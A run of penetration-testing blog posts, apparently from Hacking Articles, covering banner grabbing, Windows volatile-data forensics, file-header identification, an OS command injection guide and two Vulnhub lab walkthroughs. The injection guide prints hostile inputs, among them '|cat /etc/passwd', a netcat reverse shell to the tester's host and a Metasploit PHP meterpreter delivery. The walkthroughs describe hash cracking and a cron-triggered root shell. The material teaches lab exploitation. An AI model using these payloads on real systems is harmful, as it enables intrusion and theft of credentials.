Here we got our root.txt… That explains it all. So that’s for now. See you next time.

HAPPY HACKING!!

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn

The post Tre:1 Vulnhub Walkthrough appeared first on Hacking Articles.

Grabbing a banner is the first and apparently the most important phase in both the offensive and defensive penetration testing environments. In this article, we’ll take a tour to “Banner Grabbing” and learn how the different command-line tools and web interfaces help us to grab the banner of a webserver and its running services.

Table of Content

• Introduction
• Why Banner Grabbing?
• Types of Banner Grabbing
• Banner grabbing using Kali Linux
  • whatweb
  • cURL
  • wget
  • telnet
  • netcat
  • Nikto
  • Nmap
  • Dmitry
• Banner grabbing over Burpsuite
• Banner grabbing using Netcraft
• Banner grabbing through Browser Extensions.
  • Wappalyzer
  • HTTP Header Live
• Banner grabbing using ID Serve

Introduction

“Banner Grabbing” is often termed as “Service Fingerprinting”.

Banner refers to a text message received from the host, usually, it includes information about the open ports and services with their version numbers.

Why Banner Grabbing?

Banner Grabbing allows an attacker to discover network hosts and running services with their versions on the open ports and moreover operating systems so that he can exploit the remote host server.

Banner Disclosure is the most common vulnerability with a “CWE-200 i.e. Exposure of Sensitive Information to an Unauthorized Actor” and a “CVSS Score of 5.0 with the Risk factor as Medium.”

In order to clear the vision, we’ll consider an attack scenario:

As we all know that Microsoft Windows 7 are exploitable by Eternal Blue (CVE-2017-0143) directly with SMBv1 service. In order to enumerate this server, the attacker needs to grabs a service banner which displays whether the SMB service with a vulnerable version is running over it or not. If running, he/she can easily exploit the Microsoft server directly with the Eternal Blue attack. You can learn more about this attack from here.

Types of Banner Grabbing

1. Active Banner grabbing –In this, the attacker craft or modify his/her own packets and send them to the remote host server and analyses the response data in order to get the operating system information and the services running with their versions.
2. Passive Banner grabbing –Here the attacker collecting data about our target using publically available information i.e. by analyzing the server either with the help of “Error Messages” or by “Sniffing up the Network Traffic”.

Up till now, you might have gained a lot of information about what is Banner Grabbing and why it is used?

Let’s continue this journey by exploring the most aggressive and direct methods of grabbing a service banner.

Banner grabbing using Kali Linux

Whatweb

“WhatWeb” recognizes websites, which helps us to grab the web-applications banner by disclosing the server information with its version, the IP address, the webpage Title and running operating system.

Type the following command in order to capture the essentials.

whatweb <website URL>

whatweb http://192.168.0.11

cURL

The cURL command includes the functionality for retrieving the banner details from HTTP servers. Just execute the following command, and discover what we grab:

curl –s –I 192.168.0.11

However to fetch a clean result, we are using the -s flag to prevent the progress of the error messages from being displayed, and the -I flag to simply print out the header information of all requested pages.

Wget

We will be using the wget command to capture the HTTP banner of the remote server.

wget –q –S 192.168.0.11

The –q flag will cover-up the progress of our output, while the -S flag will print out the header information of all requested pages.

Telnet

We will be using the Telnet protocol in order to interact with services to grab their banners.

Type following command to grab the FTP banner of the remote server.

telnet 192.168.0.11 21

As a result, it will dumb “220 (vsFTPd 3.0.3)”

Netcat

Netcat is a network utility that will again help us to grab the FTP banner of the remote host server.

nc  192.168.0.11 21

From the above image, you can check that it dumbs up “220 (vsFTPd 3.0.3)”

Nikto

Nikto is an open-source web-application scanner, which we’ll be using to grab a banner of a website running on an Ubuntu server.

Type the following command in order to capture the installed web server – its version, the configuration index files, the HTTP server options and a list of other useful details.

nikto –h http://192.168.0.11

The –h flag is used to specify the host.

Nmap

We’ll use Nmap as a simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within a couple of seconds

Type following command which will grab banner for the SSH service running on port 22 in the remote host.

nmap -sV –p22 192.168.0.11

The -sV flag prints out the version of the running service.

From the above screenshot, you can read the SSH service and its version, fetched by NMAP as “OpenSSH 7.6p1 Ubuntu 4ubuntu0.3”

Dmitry

Dmitry (Deepmagic Information Gathering Tool) has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and many more.

The –pb flag is used to grab the banner for all the open-ports of the remote host.

 Fire the following command to grab the banners of the running services.

dmitry –pb 192.168.0.11

Banner Grabbing over Burpsuite

While performing an attack or a penetration test, we all use burp suite somewhere or the other, but does it help us to identify the target’s web server?

Yes, we can simply grab the server’s information through the response generated by the repeater.

From the below screenshot you can see that I’ve sent the interpreted request into the repeater. As soon as I hit the send button, the response will be executed and on the right-hand side you will get the captured server details as Apache/2.4.29 (Ubuntu)

Banner Grabbing using Netcraft

Netcraft is one of the most operatable information gathering web-interface which help us to check the technologies and the infrastructure of the web-applications.

So I’ll be using a demo website over Netcraft in order to grab some service banners and capture all the possible information.

From the above image, you can see that I have grabbed the Hosting History of testphp.vulnweb.com, which shows up the IP addresses, the operating systems and the webservers along with their last seen.

Banner Grabbing through Browser Extensions

Sometimes it’s a bit time consuming while grabbing banners of multiple web applications. Thus in order to make our work faster, we will be setting up some browser extensions that will help us to capture the server information with their version numbers, the running operating systems and the other frameworks that drive up the web applications.

Wappalyzer

Wappalyzer is a free browser extension available for both Mozilla Firefox and Google Chrome. It helps us to check the technologies of the web-application, majorly the server with its version and the framework running on it. You can add this extension in your browser from here.

From the above image you can see that, we have easily captured “Apache 2.2.0” as the server, “PHP 5.3.10” as the programming language and “Ubuntu and Fedora” as the running operating systems.

HTTP Header Live

This extension gives us the power to capture the ongoing HTTP Requests before they are sent to the server.

Therefore we are going to garb some server banners through this HTTP Header extension. You can add it in your browser from here.

From the below image you can see that, as soon as I capture the HTTP request, I was presented with the target’s information containing the server and the operating system banners i.e. Apache/2.4.29 (Ubuntu)

Banner Grabbing using ID Serve

ID Server is a free and a general-purpose Internet server identification utility which helps us to grab the banner of a remote host. You can download the tool from here.

Just enter the target’s website URL and hit the “Query This Server” button. And there it goes, it dumps everything it could, including the IP addresses, open ports, cookie and the server information.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Multiple Ways to Banner Grabbing appeared first on Hacking Articles.

In this article, we will run a couple of CLI commands that help a forensic investigator to gather volatile data from the system as much as possible. The commands which we use in this post are not the whole list of commands, but these are most commonly used once.

As per forensic investigator, create a folder on the desktop name “case” and inside create another subfolder named as “case01” and then use an empty document “volatile.txt” to save the output which you will extract.

Here I have saved all the output inside /SKS19/prac/notes.txt which help us creating an investigation report.

Table of Content

• What is Volatile Data?
• System Information
• Currently available network connections
• Routing Configuration
• Date and Time
• System Variables
• Task List
• Task List with Modules
• Task List with Service
• Workstation Information
• MAC Address save in system ARP Cache
• System User Details
• DNS configuration
• System network shares
• Network configuration

What is Volatile Data?

There are two types of data collected in Computer Forensics Persistent data and Volatile data. Persistent data is that data that is stored on a local hard drive and it is preserved when the computer is OFF. Volatile data is any kind of data that is stored in memory, which will be lost when computer power or OFF.

Volatile data resides in the registry’s cache and random access memory (RAM). This investigation of the volatile data is called “live forensics”.

System Information

It is a system profiler included with Microsoft Windows that displays diagnostic and troubleshooting information related to the operating system, hardware, and software.

We can collect this volatile data with the help of commands. All we need is to type this command.

systeminfo >> notes.txt

It will save all the data in this text file. We check whether this file is created or not by [ dir ] command to compare the size of the file each time after executing every command.

Now, go to this location to see the results of this command. Where it will show all the system information about our system software and hardware.

Currently Available Network Connections

Network connectivity describes the extensive process of connecting various parts of a network. With the help of routers, switches, and gateways.

We can check all the currently available network connections through the command line.

netstat -nao >> notes.txt

we can check whether it is created or not with the help of [dir] command as you can see, now the size of the get increased.

Now, open that text file to see all active connections in the system right now. It will also provide us with some extra details like state, PID, address, protocol.

Routing Configuration

It specifies the correct IP addresses and router settings. Host configuration: sets up a network connection on a host computer or laptop by logging the default network settings, such as IP address, proxy, network name, and ID/password.

To know the Router configuration in our network follows this command.

route print >> notes.txt

We can check the file with [dir] command.

Open the txt file to evaluate the results of this command. Like the Router table and its settings.

Date and Time

To know the date and time of the system we can follow this command. We can also check the file is created or not with the help of [dir] command.

echo %date% %time% > notes.txt
dir

Open that file to see the data gathered with the command.

System Variables

A System variable is a dynamic named value that can affect the way running processes will behave on the computer. They are part of the system in which processes are running. For Example, a running process can query the value of the TEMP environment variable to discover a suitable location to store temporary files.

We can check all system variable set in a system with a single command.

set >> notes.txt

We can check whether the file is created or not with [dir] command.

dir

Now, open the text file to see set system variables in the system.

Task List

A Task list is a menu that appears in Microsoft Windows, It will provide a list of running applications in the system. To get the task list of the system along with its process id and memory usage follow this command.

tasklist >> notes.txt

we can also check whether the text file is created or not with [dir] command.

Open the text file to evaluate the details.

Task List with Modules

With the help of task list modules, we can see the working of modules in terms of the particular task. We can see that results in our investigation with the help of the following command.

tasklist /m >> notes.txt

we can check whether our result file is created or not with the help of [dir] command.

Open the text file to evaluate the command results.

Task List with Services

It will showcase all the services taken by a particular task to operate its action. We get these results in our Forensic report by using this command.

tasklist /svc >> notes.txt

we check whether the text file is created or not with the help [dir] command.

Open this text file to evaluate the results. It will showcase the services used by each task.

Workstation Information

A workstation is known as a special computer designed for technical or scientific applications intended primarily to be used by one person at a time. They are commonly connected to a LAN and run multi-user operating systems. Follow these commands to get our workstation details.

net config workstation >> notes.txt

to check whether the file is created or not use [dir] command.

Now, open the text file to see the investigation results.

MAC Address saved in System ARP Cache

There are two types of ARP entries- static and dynamic. Most of the time, we will use the dynamic ARP entries. This means that the ARP entries kept on a device for some period of time, as long as it is being used.

The opposite of a dynamic, if ARP entry is the static entry we need to enter a manual link between the Ethernet MAC Address and IP Address. Because of management headaches and the lack of significant negatives. We use dynamic most of the time. To get that details in the investigation follow this command.

arp -a >> notes.txt

we can whether the text file is created or not with [dir]  command.

Now, open the text file to see the investigation report.

System User Details

A user is a person who is utilizing a computer or network service. Users of computer systems and software products generally lack the technical expertise required to fully understand how they work. To get that user details to follow this command.

net user %username% >> notes.txt

we can use [dir] command to check the file is created or not.

Now, open a text file to see the investigation report.

DNS Configuration

DNS is the internet system for converting alphabetic names into the numeric IP address. When a web address is typed into the browser, DNS servers return the IP address of the webserver associated with that name. To know the system DNS configuration follow this command.

ipconfig /displaydns >> notes.txt

we can see the text report is created or not with [dir] command.

Now open the text file to see the text report.

System network shares

A shared network would mean a common Wi-Fi or LAN connection. The same is possible for another folder on the system. By turning on network sharing and allowing certain or restricted rights, these folders can be viewed by other users/computers on the same network services. We can see these details by following this command.

net share >> notes.txt

we can also check the file it is created or not with [dir] command.

Now, open that text file to see the investigation report.

Network Configuration

Network configuration is the process of setting a network’s controls, flow, and operation to support the network communication of an organization and/or network owner. This term incorporates the multiple configurations and steps up processes on network hardware, software, and other supporting devices and components. To get the network details follow these commands.

ipconfig /all >> notes.txt

As usual, we can check the file is created or not with [dir] commands.

Now, open the text file to see the investigation report.

As we said earlier these are one of few commands which are commonly used. There are plenty of commands left in the Forensic Investigator’s arsenal.

Author: Shubham Sharma is a Pentester and Cybersecurity Researcher, Contact Linkedin and twitter.

The post Forensic Investiagtion: Extract Volatile Data (Manually) appeared first on Hacking Articles.

In this article, we will learn how we can Examine Corrupted File Extension to identify the basic file header in a Forensic Investigation.

Let’s understand this with the following Scenario

In this Scenario, a forensic investigator has gone for an investigation and found out a suspicious folder where no file has any kind of file extension. Now, what will he do to proceed in his forensic investigation?

Objective: Learn to use various techniques in Forensic Investigation to analyse and examine the various file headers

• Examining Corrupted File Extension using Windows Platform.
• Examining Corrupted File Extension using Linux Platform.

Table of Content

Cheatsheet for Hex File Header

Examining Corrupted File Extension using Windows Platform

• File #1: app
• File #2: apple
• File #3: data
• File #4: Final
• File #5: lecture
• File #6: Manual
• File #7: Notes
• Recovered all files successfully

Examining Corrupted File Extension using Linux Platform

• Analyze in Linux with file command
• Analyze in Linux

Cheatsheet for Hex File Header

We all know that the hex file header is used to identify any file by examining the first 4 or 5 bytes of its hexadecimal content.

We have created our very own cheat sheet to examine these values more appropriately; Which contains all the basic files extensions and its 4 to 5 bytes starter hexadecimal value along with its ASCII translation.

Examining Corrupted File Extension using Windows Platform

As per the given scenario, the first thing which comes into our mind that let’s check these files in the command prompt [cmd]. Nevertheless, nothing is visible to the investigator.

Now Let’s try to examine each file we found this folder and try to restore them in their original format.

File #1: app

The first file, which we got is app. The first thing that comes into our mind is to open this file with the help of notepad.  We are doing it to show you guys that the file is in an unreadable format.

Now, we examine hexadecimal values of these files with Hexadecimal editor. We can use any kind of hexadecimal editor, that can show us a hexadecimal value of any file. After opening that file, we need to examine its stating hexadecimal value to know about the file type.

So, I have used Hex Workshop which you can download from here.

After, analyzing its starting bytes with our cheat sheet. We come to know that it is a .exe file with its ASCII translation MZ. MZ is the initials of Mark Zbikowski, he is the designer of the DOS executable file format. We have successfully investigated the first file as a .exe file.

Now, we have two methods to rename that file extension.

Method 1: With the help of the command line.

Follow this command to rename this file extension.

rename *app. *.exe

This command helps us to select only the app file to rename only this file extension. Because others are yet to be examined.

Method 2: We can simply change it directly by renaming the file name and providing it with an extension which we already find above.

File #2: apple

Now, it’s time to examine the second file all we know about that file is its name apple. Straight away we opened that file in the hexadecimal editor. To start analyzing its hexadecimal values.

As we have to try to match its starting 4 bytes with our cheat sheet. We were quickly able to find out it is a .jpg file with ASCII translation ÿØÿà.

Now, just rename this file with the help of this command.

rename *apple. *.jpg

This command will only change the apple file to a .jpg file. Because others are yet to be examined.

File #3: data

Time to examine the third file which name is data. We are opening that file into a hexadecimal editor, to examine its hexadecimal values.

Now, try to match it first 4 bytes with our cheat sheet which we provide above. In a few moments, we find out that it is a .zip file with ASCII translation PK.

Change the file name and provide it with an extension with the help of rename command.

rename *data. *.zip

As we know it will only make changes in data and change it into a .zip file.

File #4: Final

Here comes the fourth file which name is Final. Now, open that file in a hexadecimal editor to analyse its hexadecimal values.

After opening that file, try to match its first seven bytes with our cheat sheet. In a few moments, we found out that its values match with a .docx file. So, it is a .docx file with ASCII translation PK.

Just change its name and provide it with a .docx extension with the help of [rename] command.

rename *Final. *.docx

File #5: lecture

The fifth file named as a lecture; we try to open that file in a hexadecimal editor. To analyse its hexadecimal values, which helps us to identify its file type.

Now, try to match its first four bytes. In a moment we found out that it is a .mp3 file with an ASCII translation ID3. Just provide that file a .mp3 extension with the help of [rename] command.

rename *lecture. *.mp3

File #6: Manual

The second last file in that folder named Manual. Open that file in a hexadecimal editor to examine its hexadecimal values.

Now, try to match its four bytes with our cheat sheet. Then we come to know that it is a .pdf file with ASCII translation %PDF. Change its name and provide .pdf extension to it, with the help of rename command.

rename *Manual. *.pdf

File #7: Notes

Finally, we have reached to the file in the folder named Notes. Straight away we opened that file in a Hexadecimal editor to examine its hexadecimal values.

After opening it is saying that “It is a simple text file.”. so, we provided a .txt extension with the help of [rename] command.

rename *Notes. *.txt

Recovered all File successfully

Now, look at the folder which itself saying that we have recovered all the files successfully.

And we can also see that these files were recovered in the command prompt along with its original extension, with the help of [dir] command.

Examining Corrupted File Extension using Linux Platform

Now suppose in your investigation, you are in the same scenario where the file extension is missing but this time the Victim machine operates on Linux Environment and you are not allowed to copy this folder on another machine. Then How would you handle this situation?

Analysis using the File command

The file command is a Linux utility that analyzes each argument in an attempt to classify it. Hence, we can examine this forensic investigation in a Linux environment with the help of file command.

We are using the [ls] command to show you guys, these are the same files and the same scenario that we already explained above.

We just need to use [file] along with the file name, to know about the originality of that file. Pick the first file and use this command. It shows that it is an MS Windows executable file.

file app

Let us try the same technique with the second file named apple. Apply [file] command and provide its file name. It shows that it is a jpeg image along with its internal pieces of information.

file apple

This article will help us to identify the true identity of a file during a Forensic Investigation in both the Windows and Linux environments.

Author: Shubham Sharma is a Pentester and Cybersecurity Researcher, Contact Linkedin and twitter.

The post Forensic Investigation: Examining Corrupted File Extension appeared first on Hacking Articles.

Isn’t it great if you get the privilege to run any system commands directly on the target’s server through its hosted web-application? Or you can get the reverse shell with some simple clicks? In this article, we’ll learn about OS Command Injection, in which an attacker is able to trigger some arbitrary system shell commands on the hosted operating system via a vulnerable web-application.

Table of Content

• Introduction to Command Injection
• How Command Injection Occurs?
• Metacharacters
• Types of Command Injection
• Impact of OS Command Injection
• Steps to exploit – OS Command Injection
• Manual Exploitation
  • Basic OS Command injection
  • Bypass a Blacklist implemented
• Exploitation through Automated tools
  • Burp Suite
    • Manual
    • Fuzzing
  • Commix
  • Metasploit
• Blind OS Command Injection
  • Detection
  • Exploitation
• Mitigation – OS Command Injection

Introduction

Command Injection also referred to as Shell Injection or OS Injection. It arises when an attacker tries to perform system-level commands directly through a vulnerable application in order to retrieve information of the webserver or try to make unauthorized access into the server. Such an attack is possible only when the user-supplied data is not properly validated before passing to the server. This user data could be in any form such as forms, cookies, HTTP headers, etc.

How Command Injection Occurs?

There are many situations when the developers try to include some functionalities into their web application by making the use of the operating system commands. However, if the application passes the user-supplied input directly to the server without any validation, thus the application might become vulnerable to command injection attacks.

In order to clear the vision, let’s consider this scenario:

Think for a web-application providing functionality that any user can ping any particular IP address through his web-interface in order to confirm the host connection, which means that the application is passing the ping command with that particular input IP directly to the server.

Now if an attacker injects an unwanted system command adding up with the basic ping command using some metacharacters. Thus the web-application pass it all to the server directly for execution, allowing the attacker to gain the complete access of the operating system, start or stop a particular service, view or delete any system file and even captures a remote shell.

Metacharacters

Metacharacters are the symbolic operators which are used to separate the actual commands from the unwanted system commands. The semicolon (;) and the ampercent (&) are majorly used as separators that divides the authentic input command and the command that we are trying to inject.

The commonly used metacharacters are:

Types of Command Injection

Error based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proves that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the webserver and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not be displayed to the attacker and no error messages are returned. The attacker might use another technique to identify whether the command was really executed on the server or not.

The OS Command Injection vulnerability is one of the top 10 OWASP vulnerabilities. Therefore let’s have a look onto its impact.

Impact of OS Command Injection

OS command injection is one of the most powerful vulnerability with “High Severity having a CVSS Score of 8”.

Thus this injection is reported under:

1. CWE-77: Improper Neutralization of Special Elements used in a Command.
2. CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Wonder how to exploit this vulnerability? Let’s check out its steps:

Steps to exploit – OS Command Injection

Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS Command Injection

So I guess until now you might be having a clear vision with the concept of OS command injection and its methodology. But before making our hands wet with the attacks let’s clear one more thing i.e.

“Command Injection differs from Code Injection”, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. Source:

https://www.owasp.org/index.php/Command_Injection

Let’s Start!!

Basic OS Command injection

I’ve opened the target IP in my browser and logged in into DVWA as admin : password, from the DVWA security option I’ve set the security level to low. Now I’ve opted for the Command Injection vulnerability present on the left-hand side of the window.

I’ve been presented with a form which is suffering from OS command injection vulnerability asking to “Enter an IP address:”.

From the below image you can see that, I’ve tried to ping its localhost by typing 127.0.0.1, and therefore I got the output result.

In order to perform the “Basic OS Command Injection attack”, I’ve used the “; (semicolon)”  as a metacharacter and entered another arbitary command i.e. “ls”

127.0.0.1;ls

From the below image you can see that the “;” metacharacter did its work, and we are able to list the contents of the directory where the application actually is. Similarly we can run the other system commands such as “;pwd”, “;id” etc.

Bypass a Blacklist implemented

Many times the developers set up a blacklist of the commonly used metacharacters i.e. of  “&”, “;”, ”&&”, “||”, “#” and the other ones to protect their web-applications from the command injection vulnerabilities.

Therefore in order to bypass this blacklist, we need to try all the different metacharacters that the developer forgot to add.

I’ve increased up the security level too high and tried up with all the different combinations of metacharacters.

From the above image, you can see that I’ve successfully captured the password file by using the metacharacter “|”

127.0.0.1 |cat /etc/passwd

Command Injection using BurpSuite

Burpsuite is considered as one of the best and the most powerful tool for web-penetration testing. So we’ll try to deface the web-application through it.

I’ve now logged in into bWAPP with bee : bug by running up the target’s IP into the browser, and have even set the security level to medium and “Choose your bug” option to “OS Command Injection”.

Let’s try to enumerate this “DNS lookup” form by clicking on the Lookup button and simply capturing the browser’s request in the proxy tab and sending the same to the Repeater.

Now I just need to manipulate the target by adding up some system commands i.e. “pwd” with the help of metacharacters.

In this I’ve used “|” as the delimiter, you can choose yours.

As soon as I click on the Go tab, the response starts generating and on the right-hand side of the window you can see that I’ve captured the working directory.

Fuzzing

In the last scenario, while bypassing the implemented blacklist, we were lucky that the developer had created and set up the list with the limited combination of metacharacters. But still, it took time, to check for every possible combination of the metacharacters. And therefore it is obvious that this metacharacter would not work with every web-application, thus in order to bypass these differently generated blacklists, we’ll be doing a fuzzing attack.

Let’s check it out how!!

I’ve created a dictionary with all the possible combinations of the metacharacters and now will simply include it into my attack.

Tune in you burp suite and start intercepting the request, as soon as you capture the ongoing request send the same to the intruder by simply doing a right-click on the proxy tab and choose the option to send to intruder.

Now we’ll set up the attack position by simply shifting the current tab to the Positions tab, and selecting the area where we want to make the attack happen with the ADD button.

Time to inject our dictionary, now move to the Payload tab and click on the load button in order to load our dictionary file.

As soon as I fire up the Start Attack button, a new window will pop up with the fuzzing attack.

From the below screenshot, it’s clear that our attack has been started and there is a fluctuation in the length section. I’ve double-clicked on the length field in order to get the highest value first.

From the below image, you can see that as soon as I clicked over the 11^th Request, I was able to detect the ls command running in the response tab.

OS Command Injection using Commix

Sometimes fuzzing consumes a lot of time, and even it becomes somewhat frustrating while performing a command injection attack over it i.e. wait for the incremented length and check for every possible response it drops.

In order to make our attack simpler and faster, we’ll be using a python scripted automated tool “Commix”, which makes it very easy to find the command injection vulnerability and then helps us to exploit it. You can learn more about Commix from here.

So let’s try to drop down the web-application again by getting a commix session in our kali machine.

From the below image you can see that I’ve set the security level too high and opted the “Choose your bug” option to “OS Command Injection”.

Commix works on cookies. Thus in order to get them, I’ll be capturing the browser’s request into my burpsuite, by simply enabling the proxy and the intercept options, further as I hit up the Lookup button, I’ll be presented with the details into the burpsuite’s Proxy tab.

Fire up you Kali Terminal with commix and run the following command with the Referer, Cookie, and target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"

Type ‘y’ to resume the classic injection point and to the pseudo-terminal shell.

Great!! We’re into our target’s machine.

What if we could convert this commix shell into a meterpreter one?

As soon as we capture the commix session, we’ll try to generate a reverse meterpreter session of the target machine by executing the following commands:

reverse_tcp
set lhost 192.168.0.9
set lport 4444

As we hit enter, it will ask us to choose whether we want a netcat shell or some other (meterpreter) one. Choose option 2 and hit enter again.

Now you’ll be popped up with a new list of sessions asking for which meterpreter session you want as in whether you want it to be PHP, Windows, python etc. As our target server is running over the PHP framework, we will select option 8 i.e. a PHP meterpreter reverse shell.

When everything is done, it will provide us with a resource file with an execution command. Open a new terminal window and type the presented command there, as in our case it generated the following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc

Cool!! It’s great to see that our commix session is now having some new wings.

OS Command Injection using Metasploit

Why drive so long in order to get a meterpreter session, if we can just gain it directly through the Metasploit framework.

Let’s check it out how

Boot the Metasploit framework into your kali terminal by running up the simple command “msfconsole”.

There are many different ways that provide us with our intended outcome, but we will use the web_delivery exploit in order to find a way to transfer our malicious payload into the remote machine.

Type the following commands to generate our payload:

use exploit/multi/script/web_delivery

Now it’s time to choose our target.

Type “show targets” in order to get the complete list of all the in-built target options.

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 2222
exploit

As soon as I hit enter after typing exploit, the Metasploit framework will generate the payload with all the essentials.

We are almost done, just simply include this payload with the command using any metacharacter.

Here I’ve used & (ampercent) so that the server executes both the commands one after the another.

From the below image you can see that we are into the target’s system again, but this time we are more powerful with the Metasploit session.

Blind OS Command Injection

So until now, we were lucky enough that the web-applications were returning the outputs from the commands directly on the screen through their HTTP Responses. But there are many situations when the applications do not return anything and still run some system commands as into their backend processes. So the question arises – Do such web-applications are vulnerable to command injection??

Let’s try to figure this out by using the most reliable method the time-delay ping command which will detect whether the application is suffering from command injection or not.

Detection of Blind OS Command Injection

I’ve now logged in inside bWAPP and selected the “Choose you bug” option to “OS Command Injection – Blind”, further setting up the security level to medium.

Thus I’ve been redirected to the web application which is suffering from command injection vulnerability.

Let’s check, whether this application is actually suffering from the OS Command Injection or not.

Enter any IP address in the field provided and turn on your burpsuite monitor in order to capture the ongoing http request, thus forwarding it all into the repeater tab.

Now we’ll try to manipulate the request with

ping –c 10 192.168.0.9

As I clicked over the Go tab, it took about 10 seconds to display the response result, thus confirms up that this web-application is suffering from OS Command Injection.

Exploiting Blind OS Command Injection using Netcat

As of now, we are confirmed that the application which we are trying to surf is suffering from command injection vulnerability. Let’s try to trigger out this web-application by generating a reverse shell using netcat.

From the below image you can see that I’ve checked my Kali machine’s IP address and set up the netcat listener at port number 2000 using

nc –lvp 2000

where l = listen, v = verbose mode and p = port.

Now on the web application, I’ve injected my netcat system command with the localhost command into the input field i.e.

localhost|nc 192.168.0.9 –e /bin/bash

The –e /bin/bash empowers the netcat command to execute a bash shell on the listener machine.

Great!! We are into the victim’s shell through our kali machine and we’re now able to run any system command from here.

Mitigation – OS Command Injection

The developers should set up some strong server-side validated codes and implement a set of whitelist commands, which only accepts the alphabets and the digits rather than the characters.

You can check this all out from the following code snippet, which can protect the web-applications from exposing to the command injection vulnerabilities.

Avoid the applications from calling out directly the OS system commands, if needed the developers can use the build-in API for interacting with the Operating System.

The developers should even ensure that the application must be running under the least privileges.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Comprehensive Guide to OS Command Injection appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “eLection: 1”. It’s available at Vulnhub for penetration testing. This is a mid-level lab based on the CMS “eLection”. There are several methods (easy and medium) to access the server.  The merit of doing this lab is Love’s. Let’s start and learn how to successfully break it down with an easy way first. 

Level: Medium

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Gobuster
• Dirsearch
• system log file

Privilege Escalation

• Abuse SETUID Binary

Capture the flag

Walkthrough (Easy Way of Exploitation)

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC 192.168.10.181 -p-

Enumeration

We access the IP address of the web service and saw that the Apache default page is displayed.

It’s time to take out Gobuster and fuzzy directories with the “common.txt” dictionary (it comes pre-installed in Kali).

We found the directory “/phpmyadmin/” and a file robots.txt.

We access the robots.txt and find the path to a CMS voting system called “eLection“. We have found that access to this website is indeed accessible.

Exploitation (WITHOUT exploiting eLection was easier, but less fun). We use the “dirsearch” tool and merge files and directories into the path “/election/“.

Thanks to a careless system administrator, the directory “/logs/” is listed and we can obtain the SSH credentials of the user “Love“.

We use in the SSH service that the credentials of the user “Love” and read the flag of “user.txt“

Privilege Escalation (root)

We executed the following command to check the binaries we have access to. We found a rare binary, look for exploits related to it and found this exploit.

We downloaded the exploit into the victim’s machine, compile it and run it. We get root access and read the flag!

An alternative way of Exploitation (medium)

Remember, in the reconnaissance phase we found a “PhpMyAdmin” while performing the directory brute-forcing.  

We try with default passwords (guessing) and support the credentials “root:toor“.

We access the “eLection” database and the “tb_panitia” table, there we find the ID and the hashed password. To get the password, we can use Google by searching for the hash.I will use my “uDork (Google Hacking Tool)“.

We visit the URL that uDork has taken from us and get the password in the plain.

We go back to the “eLection” administrator panel and use the ID “1234” and the password “Zxc123!@#“. We list the version of “eLection” v.2.0, so we will look for possible exploits that can be used to escalate privileges in the system.

We found the following exploit that requires the use of credentials, this exploit will allow us to execute remote code from an “os-shell” with the tool “sqlmap“.

We followed the steps of exploitation and run sqlmap.

If everything went well, we’ll get an os-shell where we can keep playing.  We execute these two sequences and we will get the file “system.log” with the SSH credentials.

As we got the username and password in the easy method, so here also we will go ahead with those credentials to perform privilege escalation.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.

The post eLection: 1 Vulnhub Walkthorugh appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “Sunset: decoy”.  It’s available at Vulnhub for penetration testing. This is easy for the intermediate level lab. The credit for making this lab goes to whitecr0wz. Let’s start and learn how to break it down successfully.

Level: Easy/Intermediate

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Web server backup

Exploiting

• Zip2john & John The Ripper

Privilege Escalation

• Pspy64
• Crontab abuse and chkrootkit vulnerability

Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

To work more comfortably, I’ll put the IP address in /etc/hosts.

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC -p- 192.168.10.186

Enumeration

We access the web service and download the file “save.zip“.

We tried to unzip the file, but it’s password protected.

For this mission, we will use “zip2john” which will help us to extract the hash from the .zip file and later we will attack it with “John The Ripper” and the dictionary “rockyou.txt“. We will obtain the password “manual” and use it to decompress the file, this time with success.

Exploiting

In the content of the .zip, we found a backup of several system files. We read the “shadow” file, copy the two hashes into a file called “users.hash” and crack this one with John The Ripper and the “rockyou.txt” dictionary.

We connect through the SSH service, this time we will add -t “bash –noprofile” to escape from the restricted bash. In there, we will read the user flag.

Privilege Escalation (root)

We listed the files and found a binary called “honeypot.decoy“. We run it, use option 5 and see a warning that it will run in a minute.

It is time to run pspy64, we check that a binary is running as root every 60 seconds.

We looked for information about the version of this binary and found an exploit that allows to scale privileges as root.

Simply create a file called “update” and insert a reverse shell. We will give it execution permissions and wait 60 seconds with a netcat listening on port 4444 in our Kali.

After some time, we will have a session as root and we will be able to read the flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.

The post Sunset: decoy Vulnhub Walkthrough appeared first on Hacking Articles.

